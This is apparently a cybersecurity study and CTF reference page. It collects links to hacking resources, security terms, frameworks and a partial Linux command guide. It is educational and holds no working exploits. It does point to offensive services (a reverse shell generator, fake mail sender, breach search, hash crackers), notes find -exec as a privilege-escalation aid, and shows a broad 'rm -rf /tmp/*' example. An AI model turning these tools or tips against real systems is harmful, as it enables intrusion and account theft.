Thank you for exploring this project! I hope you will find the content valuable and perhaps even worth sharing with others. This project represents years of dedication, learning, and refinement, fueled by countless hours and cups of coffee ☕. If you’d like to support its continued growth, your contribution would be highly appreciated.
- Links
- CTF Sites
- Books
- Services
- Terms
- Principles and Standards
- Linux Commands
- Tools (CLI)
- Tools (GUI)
- Text Editors
- Networking
- Web Exploitation
- Content Discovery
- SQL Injection
- Command Injection
- Directory Traversal
- Authentication Bypass
- Insecure Direct Object Reference (IDOR)
- File Inclusion (LFI/RFI)
- Cross Site Request Forgery (CSRF)
- Cross Site Scripting (XSS)
- Server Side Request Forgery (SSRF)
- Server Side Template Injection (SSTI)
- Server Side Includes (SSI)
- Forensics
- Binary Exploitation
- Reverse Engineering
- Cryptography
- Miscellaneous
- Windows Exploitation
- Shells and Privilege Escalation
- Vulnerabilities & Threats
Abuse.ch - a collection of malware and threat intelligence feeds.
Ahmia - search engine for hidden services on the Tor network
AI Generated Photos - 100.000 AI generated faces.
Aperisolve - all in one steganography analysis
Archive.org - internet Archieve
ASCII Converter - Hex, decimal, binary, base64, and ASCII converter
Assembly Tutorials - assembly tutorials
Base64 Decodr/Encoder - base64 decoder/encoder
Bcrypt Generator - a simple bcrypt generator
Bug Bounty - a list of bug bounty programs
Can I use - provides up-to-date browser support tables for support of front-end web technologies.
Censys - search engine for internet connected devices
Cheatography - over 3,000 free cheat sheets, revision aids and quick references.
CodeBeautify - code Beautifier, Viewer and converter
Common ports - a lists of the most common ports
Cipher Identifier - cipher identifier
Convert Binary - a wide range of different converters for binary numbers
Convertcsv - convert SQL to CSV
Crackstation (Rainbow tables) - hash cracker
CSS Reference - CSS reference
CVECrowd - a platform for sharing and discussing cybersecurity vulnerabilities.
CVE Details - CVE security vulnerability advanced database.
CVE Mitre - list of publicly known cybersecurity vulnerabilities.
CVS - Scoring System Calculator
CyberChef - a web app for encryption, encoding, compression and data analysis.
Cybercrime Tracker - monitors and tracks various malware families that are used to perpetrate cyber crimes.
crt.sh - Certificate Transparency Log Search Engine for subdomain enumeration.
CTF 101 - learn the different CTF topics in cybersecurity
CTF Cryptography - ctf cryptography for beginners
dCode - dcode.fr has many decoders for a lot of ciphers
dehashed - is a hacked database search engine.
Diff Checker - compare images
DNSDumpster - free domain research tool that can discover hosts related to a domain
DogBolt - decompiler explorer
EmailHippo - a free email verification tool.
[Emkei] (https://emkei.cz) - fake mail generator
Explain Shell - a tool to help you understand shell commands.
ExploitDB - searchable archive from The Exploit Database.
fakenamegenerator - your randomly generated identity.
Feodo Tracker - a project by abuse.ch tracking the C2 infrastructure of the Feodo Tracker Botnet.
File Signature - a table of file signatures (aka "magic numbers")
File Signature Wiki - another list of file signatures (aka "magic numbers")
Forensically - a tool to analyze images.
Godbolt - compiler explorer
Google advanced search - google dorking made easy
Google Hacking Database - juicy information found by dorking
GTFOBins - list of Unix binaries that can be used to bypass local security restrictions in misconfigured systems.
HackerOne - HackerOne is a vulnerability coordination and bug bounty platform.
Hacking Glossary - a glossary of hacking terms made by HackTheBox.
Hash Analyzer - tool to identify hash types
Hash Identifier - hash identifier using CyberChef
have i been pwned? - check if you have an account that has been compromised in a data breach.
HexEd - HexEd is a powerful online hex editor running in your web browser
hilite.me - converts your code snippets into pretty-printed HTML formats
HSV to RGB - HSV to RGB color converter
HTML Reference - HTML reference
HTTrack - website copier
Hunter.io - find email addresses in seconds.
Image Color Picker - select a color and get the HTML Color Code of this pixel
Intelix - Search Tor, I2P, data leaks and the public web by email, domain, IP, CIDR, Bitcoin address and more.
JoomScan - Joomla Vulnerability Scanner
k8s-security - kubernetes security notes and best practices.
Kali Linux Tutorials - Kali Linux Tutorials
Keybase - it's open source and powered by public-key cryptography.
LFI - learn about local file inclusion
Linux Commands - a list of linux commands
malc0de - malware search engine.
Malware Bazaar - malware search engine.
MD5 Online - md5Online offers several tools related to the MD5 cryptographic algorithm.
Morse Code Translator a morse code translator
Morse Code Adaptive Audio Decoder - a morse code adaptive audio decoder
Morse Code Audio Decoder - a morse code audio decoder
Morse Code Sound & Vibration Listener - a morse code sound & vibration listener
Namechk - check if your desired username is available on over 500 social networks (username OSINT).
NerdyData - the search engine for source code
ntlm.pw - NTLM password cracker
Observatory by Mozilla- set of tools to analyze your website.
Office Recovery - repair corrupt JPEG, PNG, GIF, BMP, TIFF, and RAW images.
PDF24 - free and easy to use online PDF tools
Phishtool - PhishTool is a free phishing simulation tool.
NPiet - Piet is an esoteric programming language based of using colored pixels to represent commands.
Ping.eu - online Ping, Traceroute, DNS lookup, WHOIS and others.
pipl - is the place to find the person behind the email address, social username or phone number.
Pixrecovery - repair corrupt JPEG, PNG, GIF, BMP, TIFF, and RAW images.
Rapid7 - vulnerability and exploit database.
Regex101 - online regex tester and debugger: PHP, PCRE, Python, Golang and JavaScript.
RegEx Pal - online regex testing tool + other tools.
RegExr - online tool to learn, build, & test Regular Expressions (RegEx / RegExp).
Revshell - reverse shell generator.
RequestBin - RequestBin gives you a URL that collects requests so you can inspect them in a human-friendly way
RGBA Color Picker - an RGBA color picker
ShellCheck - finds bugs in your shell scripts.
Shodan - learn various pieces of information about the client’s network, without actively connecting to it.
sploitus - the exploit and tools database.
SRI Hash Generator - Subresource Integrity (SRI) Hash Generator
SSL Scanner - analyze website security.
SSL Scan - sslscan tests SSL/TLS enabled services to discover supported cipher suites
Steganographic Decoder - decodes the payload that was hidden in a JPEG image or a WAV or AU audio file
Stego Tricks - learn stego tricks
Subnet Calculator - IPv4 to IPv6 subnet calculator
Subnet Cheatsheet - subnet cheatsheet
SSL Blacklist - a free SSL blacklist that can be used to detect malicious SSL certificates.
Tabulate - create clean looking tables
Talos Intelligence - threat intelligence from Cisco.
Threat Fox - a resource for sharing indicators of compromise (IOCs).
TIO - TIO is a free online interpreter, compiler and REPL.
URL Haus - a project by abuse.ch to collect and classify malicious URLs.
urlscan.io - service to scan and analyse websites.
urlvoid - this service helps you detect potentially malicious websites.
User-Agent Switcher switch and manage user agents
Vega - web security scanner and web security testing platform
ViewDNS - one source for free DNS related tools and information.
VirusTotal - analyze suspicious files and URLs to detect types of malware.
Visual Subnet Calculator - a visual subnet calculator
WebToolHub-LE - HTML hyperlink extractor
WebToolHub - lots of different web tools
WhatsMyName - social media username enumeration
WHOIS lookup - best whois lookup
Wigle - is a website for collecting information about the different wireless hotspots around the world
WPScan - WordPress security scanner
TryHackMe - TryHackMe is a free online platform for learning cyber security, using hands-on exercises and labs.
HackTheBox - HackTheBox is a massive, online cybersecurity practical training platform.
CTFLearn - An online platform built to help ethical hackers learn, practice, and compete.
Challenges - Reverse engineering CTF training platform
Cryptohack - Cryptography learning platform.
Root Me - Root Me is a platform for everyone to test and improve knowledge in computer security and hacking.
ROP Emperium - ROP Emporium is a series of challenges based around Return Oriented Programming (ROP).
pico CTF - picoCTF is a free computer security game targeted at middle and high school students.
- Penetration Testing
- Linux Basics for Hackers
- The Linux Command Line and Shell Scripting Bible
- Black Hat Python
- The Hacker PlayBook 2 & 3
- Hacker Methodology Handbook
- Gray Hat Hacking
- Red Team Field Manual
- Metasploit
- The Web Application Hacker’s Handbook
- Real-World Bug Hunting
- Attacking Network Protocols
An Intrusion Detection and Prevention System (IDPS) or simply Intrusion Prevention System (IPS) is a system that can detect and prevent network intrusions. IDS setups can be divided based on their location in the network into:
Host-based IDS (HIDS): Installed on an OS to monitor inbound/outbound host traffic and running processes.
Network-based IDS (NIDS): A dedicated device or server monitoring network traffic via a switch’s monitor port to detect malicious activity across the network or VLANs.
A Virtual Private Network (VPN) encrypts your internet connection to protect your privacy and security.
Some of these providers are:
A Virtual Private Server (VPS) is an isolated environment created on a physical server using virtualization technology.
Some of these providers are:
Term | Description |
---|---|
Active reconnaissance | Directly interacting with the system. |
Asymmetric encryption | Uses different keys to encrypt and decrypt. |
APT | Advanced Persistent Threat (team/group or even nation-state). |
Authentication | Proving that the user is whom they claim to be. |
Broken Access Control | Example: We cannot let anyone view the webmail before logging in or modify someone else's account. |
Brute force | Attacking cryptography by trying every possible password or key. |
Cipher | A method of encrypting or decrypting data. Modern ciphers are cryptographic, but there are non-cryptographic ones like Caesar cipher. |
Ciphertext | The result of encrypting plaintext; encrypted data. |
Credential Stuffing | Attack where compromised credentials are used to gain unauthorized access to an account. |
Cryptanalysis | Attacking cryptography by finding a weakness in the underlying mathematics. |
Defacing | Modifying a website to display a message or image. |
Defensive security | Protecting a network and systems by analyzing and securing against digital threats. |
Defence-in-Depth | A security strategy involving multiple levels, also known as Multi-Level Security. |
Dynamic SSH Tunneling | Dynamic port forwarding turns your SSH client into a SOCKS proxy server. |
Encoding | A form of data representation (e.g., base64), not encryption, and immediately reversible. |
Encryption | Transforming data into ciphertext using a cipher. |
Firewall appliance | A firewall restricts connections based on predefined rules, controlling what can enter or leave a network. |
Hash collision | When two different inputs generate the same hash output. |
IDOR | Insecure Direct Object Reference, a type of access control vulnerability. |
IP Spoofing | Creating IP packets with a modified source address to hide the sender's identity or impersonate another system. |
IPP | Internet Printing Protocol. |
IaaS | Infrastructure-as-a-Service. |
Identification and Authentication Failure | Allowing brute force attacks or storing passwords in plain text. |
Identification | The ability to uniquely identify a user. |
Intrusion Detection System (IDS) | Detects system and network intrusions and attempts. |
Intrusion Prevention System (IPS) | Blocks detected intrusions and attempts to prevent network breaches. |
Key | Information needed to decrypt ciphertext and retrieve plaintext. |
Offensive security | Breaking into systems, exploiting software bugs, and finding loopholes to gain unauthorized access. |
Packet sniffing | Capturing data packets on a network. |
Passive reconnaissance | Relying on publicly available information for gathering intelligence. |
Passphrase | A password-like string used to protect a key. |
Password Spraying | Brute force attack using a list of usernames and a single password to gain system access. |
Penetration Tester | A professional who tests systems to find exploitable vulnerabilities. |
Plaintext | Unencrypted data, often text but could be any file like a photograph. |
Proxy | A server acting as a gateway between an application and the internet. |
Private Blog Network (PBN) | A network of websites used to build links to improve search engine rankings. |
Port Forwarding | Technique allowing external devices to access services on private networks. |
RCE | Remote Code Execution vulnerability allowing commands to be executed on a target system. |
Rainbow tables | Lookup tables of hashes to corresponding plaintexts used in password cracking. |
Red Teamer | Plays the role of an adversary, simulating attacks on an organization. |
Reverse SSH Connection | A remote system initiates a connection to your local system. |
SAM | Security Account Manager, a Windows database storing user accounts and security descriptors. |
SSH Tunneling | Transporting arbitrary data over an encrypted SSH connection. |
SSL/TLS | Cryptographic protocols for secure data transmission; SSL is outdated, TLS is the modern version. |
Security Engineer | Designs, monitors, and maintains security controls to prevent cyberattacks. |
Symmetric encryption | Uses the same key to encrypt and decrypt. |
VPS | Virtual Private Server, a type of IaaS. |
VPN concentrator appliance | A VPN ensures network traffic confidentiality and integrity by preventing third-party access and modification. |
XSS | Cross-Site Scripting, a vulnerability in web applications that can be used to execute malicious scripts. |
There are several types of malware and attacks that can compromise systems and data. Here are some common ones.
Term | Description |
---|---|
Virus | Malware that infects a computer by inserting itself into programs, potentially causing data and program damage. Needs user interaction to spread. |
Worm | Malware that replicates itself and spreads without user interaction, often through networks, email, or other means. |
Trojan horse | Malware disguised as a legitimate program that performs harmful actions once inside a system. |
Spyware | Malware that secretly collects information about a user's activities and reports it back to the attacker. |
Phishing | A technique to steal sensitive information by posing as a legitimate organization or individual. |
DoS attack | Overloading a system with traffic to disrupt its services. |
DDoS attack & botnets | A distributed denial-of-service attack using a network of compromised devices to overload a target with traffic. |
Spam | Unwanted email that can overwhelm recipients and may spread malware or phishing attempts. |
Ransomware | Malware that encrypts data and demands payment for decryption. |
Rootkit | Malware that grants an attacker root access and conceals its presence from the user. |
Adware | Malware that displays unwanted advertisements on a computer. |
CIA Triad is a model designed to guide policies for information security within an organisation. It consists of three core principles being: Confidentiality, Integrity, and Availability.
- Confidentiality ensures that only the intended persons or recipients can access the data.
- Integrity aims to ensure that the data cannot be altered; moreover, we can detect any alteration if it occurs.
- Availability aims to ensure that the system or service is available when needed.
The security of a system is attacked through one of several means. It can be via the disclosure of secret data, alteration of data, or destruction of data. It is the opposite of the CIA triad.
- Disclosure: Unauthorized access to information. Is the opposite of confidentiality.
- Alteration: Unauthorized changes to information. Is the opposite of Integrity
- Destruction: Unauthorized or intentional destruction of information. Is the opposite of Availability
Protecting against disclosure, alteration, and destruction/denial is very important, as this protection is equivalent to working to maintain confidentiality, integrity and availability.
The Bell-LaPadula Model aims to achieve confidentiality by specifying three rules:
- Simple Security Property: This property is referred to as “no read up”; it states that a subject at a lower security level cannot read an object at a higher security level. This rule prevents access to sensitive information above the authorized level.
- Star Security Property: This property is referred to as “no write down”; it states that a subject at a higher security level cannot write to an object at a lower security level. This rule prevents the disclosure of sensitive information to a subject of lower security level.
- Discretionary-Security Property: This property uses an access matrix to allow read and write operations. An example access matrix is shown in the table below and used in conjunction with the first two properties.
The first two properties can be summarized as “write up, read down.” You can share confidential information with people of higher security clearance (write up), and you can receive confidential information from people with lower security clearance (read down).
Subjects | Object A | Object B |
---|---|---|
Subject 1 | Write | No access |
Subject 2 | Read/Write | Read |
Limitation: It was not designed to handle file-sharing.
The Biba Model aims to achieve integrity by specifying two main rules
- Simple Integrity Property: This property is referred to as “no read down”; a higher integrity subject should not read from a lower integrity object.
- Start Integrity Property: This property is referred to as “no write up”; a lower integrity subject should not write to a higher integrity object.
Limitation: Does not handle internal threats (insider threat).
The Clark-Wilson Model also aims to achieve integrity by using the following concepts:
- Constrained Data Item (CDI): This refers to the data type whose integrity we want to preserve.
- Unconstrained Data Item (UDI): This refers to all data types beyond CDI, such as user and system input.
- Transformation Procedures (TPs): These procedures are programmed operations, such as read and write, and should maintain the integrity of CDIs.
- Integrity Verification Procedures (IVPs): These procedures check and ensure the validity of CDIs.
It is vital to administrate and correctly define the various levels of access to an individuals require. These levels are determined on two primary factors:
- The individual's role/function within the organisation
- The sensitivity of the information being stored on the system
When managing access rights, two crucial concepts are used: Privileged Identity Management (PIM) and Privileged Access Management (PAM).
- PIM is used to translate a user's role within an organisation into an access role on a system.
- PAM is the management of the privileges a system's access role has, amongst other things.
What is essential when discussing privilege and access controls is the principle of least privilege. Simply, users should be given the minimum amount of privileges, and only those that are absolutely necessary for them to perform their duties.
Trust in cybersecurity is addressed through two key principles:
- Trust but Verify: Verify the actions of trusted entities through automated security mechanisms like logs and intrusion detection.
- Zero Trust: Assume no trust and require authentication and authorization for all access, reducing the potential impact of breaches. Implementations like microsegmentation enhance security.
Threat modelling is the process of reviewing, improving, and testing the security protocols in place in an organisation's information technology infrastructure and services.
This process is very similar to a risk assessment made in workplaces for employees and customers. The principles all return to:
Preparation -> Identification -> Mitigations -> Review
It is, however, a complex process that needs constant review and discussion with a dedicated team. An effective threat model includes:
- Threat intelligence
- Asset identification
- Mitigation capabilities
- Risk assessment
To help with this, there are frameworks such as STRIDE (Spoofing identity, Tampering with data, Repudiation threats, Information disclosure, Denial of Service and Elevation of privileges) and PASTA (Process for Attack Simulation and Threat Analysis)
- Vulnerability: Vulnerabilities are weaknesses that can be exploited.
- Threat: A threat represents the possibility of harm resulting from the exploitation of a vulnerability.
- Risk: Concerned with the likelihood of a threat actor exploiting a vulnerability and the potential impact on the business. Risk assessment involves evaluating the probability and consequences of security incidents.
Threat Intel is geared towards understanding the relationship between your operational environment and your adversary. With this in mind, we can break down threat intel into the following classifications:
- Strategic Intel: High-level intel that looks into the organisation's threat landscape and maps out the risk areas based on trends, patterns and emerging threats that may impact business decisions.
- Technical Intel: Looks into evidence and artefacts of attack used by an adversary. Incident Response teams can use this intel to create a baseline attack surface to analyse and develop defence mechanisms.
- Tactical Intel: Assesses adversaries' tactics, techniques, and procedures (TTPs). This intel can strengthen security controls and address vulnerabilities through real-time investigations.
- Operational Intel: Looks into an adversary's specific motives and intent to perform an attack. Security teams may use this intel to understand the critical assets available in the organisation (people, processes, and technologies) that may be targeted.
- Using UrlScan.io to scan for malicious URLs.
- Using Abuse.ch to track malware and botnet indicators.
- Investigate phishing emails using PhishTool.
- Using Cisco's Talos Intelligence platform for intel gathering.
The Pyramid of Pain is a cybersecurity concept that refers to a hierarchy of assets within an organization that, if compromised, would cause the most significant harm. The pyramid's height represents the level of harm caused by a security breach, with the most critical assets at the top and less critical assets at the bottom.
The idea is that organizations should focus their cybersecurity efforts on the assets at the top of the pyramid to prevent the most significant damage from a security breach. The components of the Pyramid of Pain may vary depending on the organization and its specific needs, but typically include sensitive data, critical infrastructure, key personnel, and reputation.
- Governance: Managing and directing an organisation or system to achieve its objectives and ensure compliance with laws, regulations, and standards.
- Regulation: A rule or law enforced by a governing body to ensure compliance and protect against harm.
- Compliance: The state of adhering to laws, regulations, and standards that apply to an organisation or system.
Benefits include better security posture, stakeholder confidence, regulatory compliance, alignment with business objectives, informed decision-making, and competitive advantage.
Developing governance documents can involve the following steps:
- Identify Scope and Purpose: Define what the document will cover and its necessity.
- Research and Review: Investigate laws, regulations, and best practices to make the document comprehensive.
- Draft the Document: Create an actionable, specific draft aligned with organizational goals.
- Review and Approval: Involve stakeholders for feedback and final approval.
- Implementation and Communication: Distribute the document and educate employees.
- Review and Update: Regularly update the document for relevance and compliance.
Policies: Formal statements that set organizational goals and how to achieve them.
Standards: Specific requirements for processes, products, or services.
Guidelines: Non-mandatory recommendations for achieving objectives.
Procedures: Step-by-step instructions for specific tasks.
Baselines: Minimum security standards that must be met.
Let's take a real-world scenario of preparing a password policy.
- Define Requirements: Set rules for password length, complexity, and expiration.
- Usage Guidelines: Specify unique passwords for each account and prohibit sharing.
- Storage and Transmission: Use encryption and secure connections.
- Change and Reset Guidelines: Define how often to change passwords.
- Communication and Monitoring: Educate employees and monitor compliance.
Now, let's take a real-world scenario of making an incident response procedure.
- Define Incident Types: Categorize incidents like unauthorized access or data breaches.
- Roles and Responsibilities: Identify key stakeholders.
- Detailed Steps: Create a step-by-step guide for each incident type.
- Reporting and Documentation: Keep records for future reference.
- Communication and Review: Make sure procedures are understood and periodically updated.
Before a penetration test starts, a formal discussion occurs between the penetration tester and the system owner. Various tools, techniques, and systems to be tested are agreed on. This discussion forms the scope of the penetration testing agreement and will determine the course the penetration test takes.
The ROE is a document that is created at the initial stages of a penetration testing engagement. This document consists of three main sections:
- Permission
- Test scope
- Rules
The steps a penetration tester takes during an engagement is known as the methodology. All of them have a general theme of the following stages:
Stage | Description |
---|---|
Information Gathering | This stage involves collecting as much publically accessible information about a target/organisation as possible, for example, OSINT and research. Note: This does not involve scanning any systems. |
Enumeration/Scanning | This stage involves discovering applications and services running on the systems. For example, finding a web server that may be potentially vulnerable. |
Exploitation | This stage involves leveraging vulnerabilities discovered on a system or application. This stage can involve the use of public exploits or exploiting application logic. |
Privilege Escalation | Once you have successfully exploited a system or application (known as a foothold), this stage is the attempt to expand your access to a system. You can escalate horizontally and vertically, where horizontally is accessing another account of the same permission group (i.e. another user), whereas vertically is that of another permission group (i.e. an administrator). |
Post-exploitation | This stage involves a few sub-stages:
|
There are three primary scopes when testing an application or service.
Box | Description |
---|---|
Black | This testing process is a high-level process where the tester is not given any information about the inner workings of the application or service. |
Grey | The tester will have some limited knowledge of the internal components of the application or piece of software. |
White | The tester will have full knowledge of the application and its expected behaviour. |
The Open Source Security Testing Methodology Manual provides a detailed framework of testing strategies for systems, software, applications, communications and the human aspect of cybersecurity.
OWASP, the Open Web Application Security Project, is a nonprofit foundation that works to improve software security. It provides free, openly available articles, methodologies, documentation, tools, and technologies in the field of web application security.
OWASP is known for its widely-referenced OWASP Top 10, a standard awareness document for developers and web application security that lists the most critical security risks to web applications.
The NIST Cybersecurity Framework is a popular framework used to improve an organisations cybersecurity standards and manage the risk of cyber threats.
The framework is divided into six core functions:
- Govern: Establish oversight to manage and reduce cybersecurity risks across the organization.
- Identify: Understand your systems, assets, and risks.
- Protect: Implement safeguards to ensure services' security.
- Detect: Identify cybersecurity threats and breaches in real-time.
- Respond: Take action when cybersecurity events are detected.
- Recover: Restore operations and improve resilience post-incident.
The NCSC Cyber Assessment Framework (CAF) is a structured guide designed to ensure the security of organizations, particularly those part of the Critical National Infrastructure.
The CAF aligns with NIS regulations and is structured around 14 objectives, categorized into four main goals: managing security risk, protecting against cyber attacks, detecting cybersecurity events, and minimizing the impact of incidents. It provides comprehensive indicators of good practice for organizations to assess and improve their security posture
The MITRE ATT&CK framework is a knowledge base of adversary tactics and techniques based on real-world observations. It is used as a foundation for the development of specific threat models and methodologies in the private sector, government, and the cybersecurity product and service community.
The Unified Kill Chain is a framework that combines the Lockheed Martin Cyber Kill Chain and the MITRE ATT&CK framework to provide a comprehensive view of the cyber kill chain. It is designed to help organizations understand and respond to cyber threats more effectively.
The Unified Kill Chain consists of the following stages:
- Reconnaissance: Gathering information about the target.
- Weaponization: Developing or obtaining the tools needed to exploit vulnerabilities.
- Delivery: Delivering the weaponized payload to the target.
- Exploitation: Exploiting vulnerabilities to gain access to the target.
- Installation: Installing malware or other tools to maintain access to the target.
- Command and Control: Establishing communication channels to control the compromised system.
- Actions on Objectives: Achieving the attacker's goals, such as stealing data or disrupting operations.
See the 18 phases of attack here.
ISO/IEC 19249 outlines architectural and design principles for creating secure IT products and systems
- Least Privilege: This principle emphasizes providing the minimum permissions necessary for individuals or entities to perform their tasks. (Design Principle: 1)
- Attack Surface Minimization: It focuses on reducing the potential points of attack by eliminating unnecessary services and reducing vulnerabilities. (Design Principle: 2)
- Centralized Parameter Validation: This principle suggests centralizing the validation of input parameters to prevent threats that may exploit vulnerabilities. (Design Principle: 3)
- Centralized General Security Services: It advocates for centralizing security services such as authentication to enhance control and reduce potential points of failure. (Design Principle: 4)
- Preparing for Error and Exception Handling: This principle emphasizes designing systems to handle errors and exceptions gracefully and securely, ensuring they do not leak sensitive information. (Design Principle: 5)
The five architectural principles outlined in ISO/IEC 19249:
- Domain Separation: Components are grouped into distinct entities, each with its own domain and set of security attributes. This separation helps control access and privileges. (Architectural Principle: 1)
- Layering: The system is structured into abstract levels or layers, enabling the imposition of security policies at different levels and facilitating validation of system operations. (Architectural Principle: 2)
- Encapsulation: Involves hiding low-level implementations and preventing direct manipulation of data by providing specific methods, similar to object-oriented programming, to ensure data integrity. (Architectural Principle: 3)
- Redundancy: Ensures availability and integrity by implementing redundancy measures. Examples include redundant power supplies or RAID configurations in data storage. (Architectural Principle: 4)
- Virtualization: Sharing a single set of hardware among multiple operating systems, which enhances security boundaries and containment of malicious programs, particularly relevant in the context of cloud services. (Architectural Principle: 5)
ISO (the International Organization for Standardization) is a worldwide federation of national standards bodies (ISO member bodies), where ISO27001 is an international standard on how to manage information security.
An ISMS consists of the policies, procedures, guidelines, and associated resources and activities, collectively managed by an organization, in the pursuit of protecting its information assets.
It is a systematic approach for establishing, implementing, operating, monitoring, reviewing, maintaining and improving an organization’s information security to achieve business objectives. It is based on a risk assessment and the organization’s risk acceptance levels designed to effectively treat and manage risks.
Hackers are sorted into three hats, where their ethics and motivations behind their actions determine what hat category they are placed into.
Hat | Description |
---|---|
Black hat | These people are criminals and often seek to damage organisations or gain some form of financial benefit at the cost of others. |
Grey hat | These people use their skills to benefit others often; however, they do not respect/follow the law or ethical standards at all times. |
White hat | These hackers are considered the "good people". They remain within the law and use their skills to benefit others. |
Career | Description |
---|---|
Security Analyst | Responsible for maintaining the security of an organisation's data |
Security Engineer | Design, monitor and maintain security controls, networks, and systems to help prevent cyberattacks |
Incident Responder | Identifies and mitigates attacks whilst an attackers operations are still unfolding |
Digital Forensics Examiner | Responsible for using digital forensics to investigate incidents and crimes |
Malware Analyst | Analyses all types of malware to learn more about how they work and what they do |
Penetration Tester | Responsible for testing technology products for security loopholes |
Red Teamer | Plays the role of an adversary, attacking an organisation and providing feedback from an enemies perspective |
Also includes other useful CLI tools and commands for Linux and Windows.
List of contents
- cat
- ls
- mkdir
- touch
- tree
- ps
- htop
- rm
- mv
- top
- lsof
- kill
- find
- where
- whatis
- locate
- apropos
- stat
- df
- du
- ncdu
- free
- uniq
- sort
- diff
- tail-head
- history
- pwd
- chmod
- chown
- curl
- wget
- wash
- netdiscover
- netstat
- ss
- tcpdump
- whatweb
- apt
- dig
- tar
- gzip
- grep
- wc
- cut
- tr
- column
- awk
- sed
- whoami
- uname
- ftp
- ssh
- scp
- searchsploit
- xfreerdp
- hexeditor
- binwalk
- sudo
- hashid
- hash-identifier
- haiti
- shasums
- base64
- gpg
- hexdump
- xxd
- objdump
- exiftool
- fcrackzip
- neofetch
- crunch
- cewl
- rax2
- jq
- gcc
- adduser
- addgroup
cat is a Linux shell command that concatenates files and prints on the standard output. It is often used to view the content of a file. For Windows, the equivalent command is type
.
Example
cat -n example.txt
Options
-n
number all output lines
ls is a Linux shell command that lists directory contents of files and directories.
-i
list file's inode index number
-a
list all files including hidden file starting with '.'
-l
list with long format - show permissions
-d
list directories - with ' */'
-s
list file size
-S
sort by file size
-t
sort by time & date
-X
sort by extension name
Created directories
Syntax
mkdir <name>
The command mkdir has an option marked -p to add parent directories.
mkdir -p Folder/i/am/in
Creates a file
Example:
touch file.txt
We can look at the whole structure after creating the parent directories with the tool tree.
Syntax:
tree .
Shows the processes for the current shell
PID – the unique process ID
TTY – terminal type that the user is logged into
TIME – amount of CPU in minutes and seconds that the process has been running
CMD – name of the command that launched the process.
-a
all processes from all users
-u
user-oriented format, details
-x
will display all processes even those not associated with the current tty
-t
Processes associated with the terminal run
htop is an interactive process viewer for Unix systems
sudo apt install htop
Options
-d
Delay between updates, in tenths of seconds
-u
Show only processes owned by a specified user
-p
Show only processes with specified process IDs
-s
Sort by specified column (use --sort-key help for a list)
-t
Tree view
-U
Do not use unicode but plain ASCII
Deletes files
Example:
rm -rf /tmp/*
-r
Deletes every file in the directory
-f
Suppresses all warning prompts
Moves/renames files
Example (relocate):
mv file.txt /tmp
Example (rename):
mv file.txt file2.txt
top command is used to show the Linux processes. It provides a dynamic real-time view of the running system
lsof stands for list open files. It is a command-line utility that lists all the open files and the processes that opened them.
Syntax
lsof <options> <file>
Examples
Only show openvpn processes
lsof -i | grep openvpn
Used to kill a process
The most commonly used signals are:
1 (HUP) - Reload a process.
9 (KILL) - Kill a process.
15 (TERM) - Gracefully stop a process.
kill -9 PID_ID
The find command is used to search and locate the list of files and directories
Syntax
find <location> <options>
Examples
Find all config files that are bigger than 25kilobytes and are newer than 2020-03-03, and then execure the ls -la command without printing the error in the terminal
find / -type f -name *.conf -size +25k -newermt 2020-03-03 -exec ls -al {} \; 2>/dev/null
Search for files from root
find / -type f -name passwords.txt
Find any file with the extension of ".txt"
find / -name *.txt
Check the permissions for what the ‘users’ group can do
find / -group users -type f 2>/dev/null
Location specific options
No specification = this folder
/ = root folder
. = this folder and its subdirectories
Other options
-name
= specify file specific name/descriptions to be found
-iname
= Like -name, but the match is case insensitive.
-print
= It prints the pathname of the current file to standard output.
-regex
= True if the whole path of the file matches pattern using expression
-type
= With -type, you can use d to only find directories, and f to only find files.
-user
= specify owner
-size
= specify size
-perm
= specify permissions
Time specific
min and time. a(acessed), m(modified), c
To put it all together: in order to specify that a file was last accessed more than 30 minutes ago, the option -amin +30
is used.
To specify that it was modified less than 7 days ago, the option -mtime -7
is used.
When you want to specify that a file was modified within the last 24 hours, the option -mtime 0
is used.
Note
- Suppress the output of any possible errors to make the output more readable. This is done by appending
2> /dev/null
to your command. This way, you won’t see any results you’re not allowed to access. - The second thing is the
-exec
flag. You can use it in your find command to execute a new command, following the -exec flag, like so:-exec whoami \;
. (can be used for privilege escalation)'
This tool returns the path to the file or link that should be executed.
Syntax
where python3
This tool is used to get a short description of a command.
Syntax
whatis <command>
This tool is used to find files by their name.
Syntax
locate <file_name>
This tool is used to search for a command by its description.
Syntax
apropos <something>
Example
apropos hexeditor
Displays detailed information about given files or file systems. These informations can be: file name, file size, blocks, type, inode, UID, GID, access, modify, change and creation times.
Example usage:
stat file.txt
df is a command-line utility for reporting file system disk space usage
Example usage:
get the size of the file system in gigabytes
df -BG
Options:
--block-size=SIZE
scale sizes by SIZE. E.g., -BM
prints sizes in units of 1,048,576 bytes.
--exclude-type=TYPE
exclude file systems of type TYPE
-h
print sizes in human readable format (e.g., 1K 234M 2G)
-T
print file system type
-t
limit listing to file systems of type TYPE
du is a command that can be used to estimate file space usage. It is a part of the GNU coreutils suite.
Example usage:
du -shL BreachCompilation
Options:
-a
to display an entry for each file in a file hierarchy
-c
displays total size at the end
-d <number>
to specify the depth of the directory tree to be displayed
-h
to get a human-readable output
-L
dereference all symbolic links
-s
to get the total size of the directory
--time
get the results with timestamps of last modification
ncdu is a disk usage analyzer with an ncurses interface. It is a part of the ncdu suite.
Example usage:
ncdu -x --si BreachCompilation
Options:
-x
- This option prevents ncdu from following symbolic links.
--si
- This option tells ncdu to use SI units (powers of 10) to display the file sizes, which makes them easier to read than the default binary units (powers of 2).
free is a command-line utility that displays the total amount of free and used physical and swap memory in the system, as well as the buffers and caches used by the kernel.
Example usage:
free -h
Options:
-b
- to display the amount of memory in bytes
-k
- to display the amount of memory in kilobytes
-m
- to display the amount of memory in megabytes
-g
- to display the amount of memory in gigabytes
-h
- to display the amount of memory in a human-readable format
-s N
- to update the output every N seconds
uniq is a command-line utility that removes duplicate lines from a sorted file.
Example
uniq file.txt
Options
-c
count the number of occurrences of each line
-d
only print duplicate lines
-u
only print unique lines
-i
to ignore case
sort is a command-line utility that sorts lines of text files.
Syntax:
sort [OPTION] [FILE]
Options:
-b
- ignore leading blanks
-c
- check if the file is sorted
-r
- to sort in reverse order
-o
- to write output to a file
-u
- sort and remove duplicate lines
-n
- to sort numerically
-g
- to sort general-numeric
-h
- to sort human readable numbers
-f
- ignore case
diff is a command-line utility that allows you to compare two files line by line
Example usage:
diff a.txt b.txt
The tail/head command, as the name implies, print the last/first N number of data of the given input
Options:
-n <number>
number of lines to show
-c <numbers>
number of bytes
sort
to sort
history
command in Linux is a built-in shell tool that displays a list of commands used in the terminal session
